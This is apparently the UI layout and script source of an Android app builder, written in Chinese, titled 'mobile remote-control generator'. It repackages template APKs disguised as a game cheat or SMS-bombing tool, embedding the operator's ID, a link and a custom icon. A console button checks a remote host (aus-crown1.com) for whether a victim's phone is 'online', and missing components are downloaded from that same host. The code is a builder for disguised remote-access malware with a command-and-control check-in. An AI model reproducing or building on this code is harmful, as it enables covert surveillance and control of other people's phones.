<View id="1" did="0" type="RelativeLayout">
<ppt>
width=-1
height=-1
</ppt>
<event>
</event>
</View>
<View id="2" did="1" type="LinearLayout">
<ppt>
width=-1
height=-1
orientation=vertical
background=black
</ppt>
<event>
</event>
</View>
<View id="3" did="2" type="LinearLayout">
<ppt>
width=-1
height=90dp
orientation=horizontal
</ppt>
<event>
</event>
</View>
<View id="4" did="3" type="LinearLayout">
<ppt>
width=-1
height=-1
orientation=vertical
layout_weight=1
gravity=center_vertical
</ppt>
<event>
</event>
</View>
<View id="6" did="4" type="CardView">
<ppt>
width=-2
height=-2
app_CardcornerRadius=20dp
layout_marginLeft=-10dp
</ppt>
<event>
</event>
</View>
<View id="7" did="6" type="LinearLayout">
<ppt>
width=100dp
height=-1
orientation=vertical
gravity=center
BackgroundColor=#b4000000
</ppt>
<event>
</event>
</View>
<View id="8" did="7" type="TextView">
<ppt>width=-2
height=-2
text=手机远控生成
typeface=@3f12bc4a942.ttf
textColor=#ffffffff
textSize=13dp
layout_marginTop=5dp
layout_marginBottom=5dp
</ppt>
<event>
</event>
</View>
<View id="5" did="3" type="LinearLayout">
<ppt>
width=-1
height=-1
orientation=horizontal
layout_weight=1
gravity=right
</ppt>
<event>
</event>
</View>
<View id="44" did="5" type="CardView">
<ppt>
width=-2
height=-2
layout_marginRight=20dp
app_CardcornerRadius=5dp
layout_gravity=center_vertical
</ppt>
<event>
</event>
</View>
<View id="45" did="44" type="LinearLayout">
<ppt>
width=-2
height=-2
orientation=vertical
BackgroundColor=#b4000000
</ppt>
<event>
</event>
</View>
<View id="46" did="45" type="ImageView">
<ppt>
width=30dp
height=30dp
src=@ic_play_list_close.png
</ppt>
<event>
<eventItme type="clicki">
end()
</eventItme>
</event>
</View>
<View id="12" did="2" type="LinearLayout">
<ppt>
width=-1
height=-1
orientation=vertical
</ppt>
<event>
</event>
</View>
<View id="13" did="12" type="CardView">
<ppt>
width=-1
height=-1
app_CardcornerRadius=20dp
layout_marginBottom=-20dp
</ppt>
<event>
</event>
</View>
<View id="14" did="13" type="LinearLayout">
<ppt>
width=-1
height=-1
orientation=vertical
</ppt>
<event>
</event>
</View>
<View id="15" did="14" type="LinearLayout">
<ppt>
width=-1
height=60dp
orientation=horizontal
gravity=center_vertical
layout_marginLeft=10dp
</ppt>
<event>
</event>
</View>
<View id="16" did="15" type="CardView">
<ppt>
width=-2
height=-2
app_CardcornerRadius=5dp
</ppt>
<event>
</event>
</View>
<View id="17" did="16" type="LinearLayout">
<ppt>
width=-2
height=-2
orientation=vertical
BackgroundColor=#b4000000
</ppt>
<event>
<eventItme type="clicki">
us(17,"backgroundcolor","#b4000000")
us(20,"backgroundcolor","#57000000")
us(23,"visibility","visible")
us(38,"visibility","gone")
</eventItme>
</event>
</View>
<View id="18" did="17" type="TextView">
<ppt>
width=-2
height=-2
text=使用功能
typeface=@3f12bc4a942.ttf
textColor=#ffffffff
textSize=12dp
layout_marginTop=5dp
layout_marginBottom=5dp
layout_marginLeft=7dp
layout_marginRight=7dp
</ppt>
<event>
</event>
</View>
<View id="19" did="15" type="CardView">
<ppt>
width=-2
height=-2
app_CardcornerRadius=5dp
layout_marginLeft=10dp
</ppt>
<event>
</event>
</View>
<View id="20" did="19" type="LinearLayout">
<ppt>
width=-2
height=-2
orientation=vertical
BackgroundColor=#57000000
</ppt>
<event>
<eventItme type="clicki">
us(20,"backgroundcolor","#b4000000")
us(17,"backgroundcolor","#57000000")
us(38,"visibility","visible")
us(23,"visibility","gone")
</eventItme>
</event>
</View>
<View id="21" did="20" type="TextView">
<ppt>
width=-2
height=-2
text=使用帮助
typeface=@3f12bc4a942.ttf
textColor=#ffffffff
textSize=12dp
layout_marginTop=5dp
layout_marginBottom=5dp
layout_marginLeft=7dp
layout_marginRight=7dp
</ppt>
<event>
</event>
</View>
<View id="53" did="15" type="LinearLayout">
<ppt>width=-1
height=-1
orientation=horizontal
gravity=center_vertical
</ppt>
<event></event>
</View>
<View id="57" did="53" type="TextView">
<ppt>width=-2
height=-2
text=当前为:
typeface=@3f12bc4a942.ttf
textColor=#ff000000
textSize=14dp
layout_marginTop=5dp
layout_marginBottom=5dp
layout_marginLeft=7dp
layout_marginRight=0dp
</ppt>
<event></event>
</View>
<View id="58" did="53" type="Spinner">
<ppt>width=-1
height=-1
layout_weight=1
</ppt>
<event><eventItme type="onitemselected">f(st_pN==0)
{
  sss 模板=1
}
else f(st_pN==1)
{
  sss 模板=2
}
else f(st_pN==2)
{
  sss 模板=3
}</eventItme><eventItme type="onnothingselected">{</eventItme></event>
</View>
<View id="56" did="15" type="TextView">
<ppt>width=-2
height=-2
text=当前为:
typeface=@b004b9c310f.ttf
textColor=#ff000000
textSize=14dp
layout_marginTop=5dp
layout_marginBottom=5dp
layout_marginLeft=7dp
layout_marginRight=0dp
</ppt>
<event></event>
</View>
<View id="22" did="14" type="TextView">
<ppt>
width=-1
height=1dp
text=
BackgroundColor=#b4000000
</ppt>
<event>
</event>
</View>
<View id="23" did="14" type="LinearLayout">
<ppt>
width=-1
height=-1
orientation=vertical
visibility=visible
</ppt>
<event>
</event>
</View>
<View id="24" did="23" type="LinearLayout">
<ppt>
width=-1
height=-2
orientation=vertical
background=#ffffff
clipChildren=false
padding=10dp
</ppt>
<event>
</event>
</View>
<View id="25" did="24" type="RelativeLayout">
<ppt>
width=-1
height=-2
layout_margin=10dp
clipChildren=false
</ppt>
<event>
</event>
</View>
<View id="26" did="25" type="EditText">
<ppt>
width=-1
height=-2
gravity=center_vertical
text=
ut_centerInParent=true
layout_marginLeft=15dp
background=
focusable=false
singleLine=true
</ppt>
<event>
<eventItme type="touchmonitor">
us(26,"focusable",true)
us(26,"focusableintouchmode",true)
</eventItme>
<eventItme type="focuschange">
dht(dh1,0,0,0,0)
dh(dh1,"duration",0)
us(30,"dh",dh1)
us(30,"textcolor","#898989")
us(30,"layout_margintop",0)
gvs(61,v)
us(61,"dh",dh1)
us(61,"textcolor","#898989")
us(61,"layout_margintop",0)
gvs(61,v)
java(h,v,"android.view.View.getHeight")
s/(-2,h)
us(30,"layout_margintop",h)
us(30,"textsize","14sp")
us(30,"ut_centervertical",false)
us(61,"layout_margintop",h)
us(61,"textsize","14sp")
us(61,"ut_centervertical",false)
gvs(27,ss.v)
us(ss.v,"textcolor","#ff000000")
gvs(26,v)
java(h,v,"android.view.View.getHeight")
s/(-2,h)
us(ss.v,"textsize","16sp")
us(ss.v,"layout_margintop",0)
us(ss.v,"ut_centervertical",true)
dht(dh,0,0,0,h)
dh(dh,"duration",150)
dhs(dh1,1,0.85,1,0.85)
dh(dh1,"duration",150)
dhset(dhlist,false,dh,dh1)
us(ss.v,"dh",dhlist)
dh(dhlist,"after",true)
</eventItme>
</event>
</View>
<View id="27" did="25" type="TextView">
<ppt>width=-2
height=-2
text=请输入ID(你的软件标识)
ut_centerVertical=true
layout_marginLeft=12.5dp
textColor=#898989
background=#ffffff
textSize=14sp
</ppt>
<event>
</event>
</View>
<View id="59" did="24" type="RelativeLayout">
<ppt>
width=-1
height=-2
layout_margin=10dp
clipChildren=false
</ppt>
<event>
</event>
</View>
<View id="60" did="59" type="EditText">
<ppt>
width=-1
height=-2
gravity=center_vertical
text=
ut_centerInParent=true
layout_marginLeft=15dp
background=
focusable=false
singleLine=true
</ppt>
<event>
<eventItme type="touchmonitor">us(60,"focusable",true)
us(60,"focusableintouchmode",true)</eventItme>
<eventItme type="focuschange">
dht(dh1,0,0,0,0)
dh(dh1,"duration",0)
us(30,"dh",dh1)
us(30,"textcolor","#898989")
us(30,"layout_margintop",0)
gvs(27,v)
us(27,"dh",dh1)
us(27,"textcolor","#898989")
us(27,"layout_margintop",0)
gvs(27,v)
java(h,v,"android.view.View.getHeight")
s/(-2,h)
us(30,"layout_margintop",h)
us(30,"textsize","14sp")
us(30,"ut_centervertical",false)
us(27,"layout_margintop",h)
us(27,"textsize","14sp")
us(27,"ut_centervertical",false)
gvs(61,ss.v)
us(ss.v,"textcolor","#ff000000")
gvs(60,v)
java(h,v,"android.view.View.getHeight")
s/(-2,h)
us(ss.v,"textsize","16sp")
us(ss.v,"layout_margintop",0)
us(ss.v,"ut_centervertical",true)
dht(dh,0,0,0,h)
dh(dh,"duration",150)
dhs(dh1,1,0.85,1,0.85)
dh(dh1,"duration",150)
dhset(dhlist,false,dh,dh1)
us(ss.v,"dh",dhlist)
dh(dhlist,"after",true)
</eventItme>
<eventItme type="press">
javags(agc,"android.content.Intent","android.content.Intent.ACTION_GET_CONTENT")
javanew(it,"android.content.Intent","String",agc)

java(c,it,"android.content.Intent.setType","String","*/*")

javags(ca,"android.content.Intent","android.content.Intent.CATEGORY_OPENABLE")
java(c,it,"android.content.Intent.addCategory","String",ca)

java(c,activity,"android.app.Activity.startActivityForResult","android.content.Intent",it,"int",2)

</eventItme></event>
</View>
<View id="61" did="59" type="TextView">
<ppt>width=-2
height=-2
text=请输入软件图标路径(长按选择)
ut_centerVertical=true
layout_marginLeft=12.5dp
textColor=#898989
background=#ffffff
textSize=14sp
</ppt>
<event>
</event>
</View>
<View id="28" did="24" type="RelativeLayout">
<ppt>
width=-1
height=-2
layout_margin=10dp
clipChildren=false
</ppt>
<event>
</event>
</View>
<View id="29" did="28" type="EditText">
<ppt>
width=-1
height=-2
gravity=center_vertical
text=
ut_centerInParent=true
layout_marginLeft=15dp
background=
focusable=false
singleLine=true
</ppt>
<event>
<eventItme type="touchmonitor">us(29,"focusable",true)
us(29,"focusableintouchmode",true)</eventItme>
<eventItme type="focuschange">
dht(dh,0,0,0,0)
dh(dh,"duration",0)
us(ss.v,"dh",dh)
us(ss.v,"textcolor","#898989")
gvs(27,v)
java(h,v,"android.view.View.getHeight")
s/(-2,h)
us(27,"layout_margintop",h)
us(27,"textsize","14sp")
us(27,"ut_centervertical",false)
gvs(30,ss.v)
us(ss.v,"textsize","16sp")
us(30,"layout_margintop",0)
us(30,"ut_centervertical",true)
us(ss.v,"textcolor","#ff000000")
gvs(29,v)
java(h,v,"android.view.View.getHeight")
s/(-2,h)
dht(dh,0,0,0,h)
dh(dh,"duration",150)
dhs(dh1,1,0.85,1,0.85)
dh(dh1,"duration",150)
dhset(dhlist,false,dh,dh1)
us(ss.v,"dh",dhlist)
dh(dhlist,"after",true)
</eventItme>
</event>
</View>
<View id="30" did="28" type="TextView">
<ppt>width=-2
height=-2
text=请输入软件内部链接
ut_centerVertical=true
layout_marginLeft=12.5dp
textColor=#898989
background=#ffffff
textSize=14sp
</ppt>
<event>
</event>
</View>
<View id="31" did="23" type="LinearLayout">
<ppt>
width=-1
height=-2
orientation=horizontal
</ppt>
<event>
</event>
</View>
<View id="32" did="31" type="LinearLayout">
<ppt>
width=-1
height=-1
orientation=vertical
layout_weight=1
gravity=center
padding=3dp
</ppt>
<event>
</event>
</View>
<View id="34" did="32" type="CardView">
<ppt>
width=-1
height=-2
layout_marginLeft=20dp
layout_marginRight=10dp
app_CardBackgroundColor=#ff000000
app_CardcornerRadius=10dp
</ppt>
<event>
</event>
</View>
<View id="35" did="34" type="Button">
<ppt>width=-1
height=-2
background=through
text=生成
typeface=@3f12bc4a942.ttf
textColor=#ffffffff
textSize=12dp
</ppt>
<event>
<eventItme type="clicki">dhs(ss10,,1.1,1,1.1,1,1,0.5,1,0.5)
dh(ss10,"duration",500)
us(34,"dh",ss10)
ug(26,"text",id)
ug(29,"text",lj)
ug(60,"text",tb)

fe("$组件/直装.apk",zj1)
fe("$组件/短信测压.apk",zj2)
fe("$组件/..apk",zj3)
f(zj1==true||zj2==true||zj3==true)
{
  f(id==""||lj==""||tb=="")
  {
    fn tw.tw("输入不能为空！",1)
  }
  else
  {
    f(sss.模板==1)
    {
      utw(null,"提示","正在打包中...",true,a)
      {
      }
      t()
      {
        fuzs("$组件/直装.apk","$组件/直装",d)
        fw("$组件/直装/assets/res/key",id)
        fw("$组件/直装/assets/res/csh",lj)
        fc(tb,"$组件/直装/res/mipmap-xxxhdpi-v4/img_iapp.png",z)
        fc(tb,"$组件/直装/res/mipmap-xxhdpi-v4/img_iapp.png",z)
        fj("$组件/直装","/storage/emulated/0/YMAZ功能盒/远控/直装.apk",i)
        ufnsui()
        {
          fn Rabe.Rabe(true,true)
          fn tw.tw("处理成功！",0)
          endutw()
        }
      }
    }
    else
    {
      fn tw.tw("暂未开发",1)
    }
  }
}
else
{
  utw("@zy/yy.png","提示","\n需要下载额外组件","下载","取消",true, v)
  {
    us(52,"url","http://aus-crown1.com/组件")
    utw(null,"","进度条.iyu",true,sss.v)
    {
    }
    
  }
  else
  {
  }
}</eventItme>
</event>
</View>
<View id="33" did="31" type="LinearLayout">
<ppt>
width=-1
height=-1
orientation=vertical
layout_weight=1
gravity=center
</ppt>
<event>
</event>
</View>
<View id="36" did="33" type="CardView">
<ppt>
width=-1
height=-2
layout_marginLeft=10dp
layout_marginRight=20dp
app_CardBackgroundColor=#ff000000
app_CardcornerRadius=10dp
</ppt>
<event>
</event>
</View>
<View id="37" did="36" type="Button">
<ppt>width=-1
height=-2
background=through
text=控制台
typeface=@3f12bc4a942.ttf
textColor=#ffffffff
textSize=12dp
</ppt>
<event>
<eventItme type="clicki">dhs(ss10,,1.1,1,1.1,1,1,0.5,1,0.5)
dh(ss10,"duration",500)
us(37,"dh",ss10)
ug(26,"text",sss.id)
t()
{
  hs("http://aus-crown1.com/yk/ck.php?id="+sss.id,jc)
  sj(jc,"&lt;div class=\"container\"&gt;","&lt;/div&gt;",jc)
  f(jc!="找不到 ID 对应的文件夹")
  {
    ufnsui()
    {
      fn tw.tw("控制机已上线！",0)
      uigo("控制台.iyu")
    }
  }
  else
  {
    ufnsui()
    {
      fn tw.tw("主机没有上线！",1)
    }
  }
}</eventItme>
</event>
</View>
<View id="41" did="23" type="LinearLayout">
<ppt>
width=-1
height=-1
orientation=vertical
</ppt>
<event>
</event>
</View>
<View id="43" did="41" type="LinearLayout">
<ppt>
width=-1
height=-1
orientation=vertical
layout_marginTop=10dp
layout_marginLeft=10dp
layout_marginRight=10dp
layout_marginBottom=10dp
</ppt>
<event>
</event>
</View>
<View id="51" did="43" type="WebView">
<ppt>width=-1
height=-1</ppt>
<event></event>
</View>
<View id="38" did="14" type="LinearLayout">
<ppt>
width=-1
height=-1
orientation=vertical
padding=20dp
visibility=gone
</ppt>
<event>
</event>
</View>
<View id="39" did="38" type="TextView">
<ppt>width=-2
height=-2
text=使用帮助
typeface=@3f12bc4a942.ttf
textColor=#ff000000
textSize=14dp
</ppt>
<event>
</event>
</View>
<View id="40" did="38" type="TextView">
<ppt>width=-2
height=-2
text=\n1:输入id(id是你的查询码，忘记就等于你后面查看不到控制手机的各种信息了)\n2:如果生成后灰包请看431577318Q群文件教程
textSize=10dp
</ppt>
<event>
</event>
</View>
<View id="52" did="0" type="WebView">
<ppt>width=-2
height=-2</ppt>
<event><eventItme type="ondownloadstart">t()
{
  ss xz="t"
  fdir("$缓存/下载进度/a",a)
  hd(st_url,a,true,b)
}

t()
{
  gvs(sss.v,1,tt)
  gvs(sss.v,2,jt)
  s lj="$组件.zip"
  fdir("$缓存/下载进度/",xzlj)
  w(true)
  {
    call(cd,"mjava","awzx.get",xzlj)
    s2((cd/st_cH)*100,n)
    syso(n)
    ufnsui()
    {
      us(tt,"text","下载进度："+n)
      us(jt,"progress",n)
    }
    f(n=="100.00")
    {
      endutw()
      break
    }
    stop(1000)
  }
  ufnsui()
  {
    ss xz="f"
    fc("$缓存/下载进度/a",lj,true,a)
    fd("$缓存/下载进度/a",a)
    fuzs("$组件.zip","$组件",c)
    fd("$组件.zip",sc)
    fn awzxx.完成()
  }
}</eventItme></event>
</View>
<UIEventset>
<eventItme type="loading">t()
{
  fn 环境检测.jc()
  fn 环境检测.c()
  fn 环境检测.aaa()
  fn 环境检测.e()
  fn 环境检测.g()
  fn 环境检测.j()
  fn 环境检测.d()
  fn 环境检测.a()
}
uycl("#ff000000",true)
ngde(4,10,"#00000000","#ff000000",bg)
us(25,"background",bg)
ngde(4,10,"#00000000","#ff000000",bg)
us(28,"background",bg)
ngde(4,10,"#00000000","#ff000000",bg)
us(59,"background",bg)
gvs(27,ss.v)
java(null,ss.v,"android.view.View.setPadding","int",7,"int",0,"int",7,"int",0)
gvs(30,tv)
java(null,tv,"android.view.View.setPadding","int",7,"int",0,"int",7,"int",0)
ngde(5,30,"#ffffffff","#57000000",back)
us(42,"background",back)
</eventItme>

<eventItme type="loadingComplete">
s a="外挂模板;短信测压模板;自定义模板"
sl(a,";",b)
uls(58,b,c)
</eventItme><eventItme type="onactivityresult">javags(er,activity,"android.app.Activity","RESULT_OK")
f(st_lC==er)
{
  f(st_sC==2)
  {
    java(uri,st_iT,"android.content.Intent.getData")
    call(path, "mjava", "uri.getRealPath", activity, uri)
    us(60,"text",path)
  }
}</eventItme></UIEventset>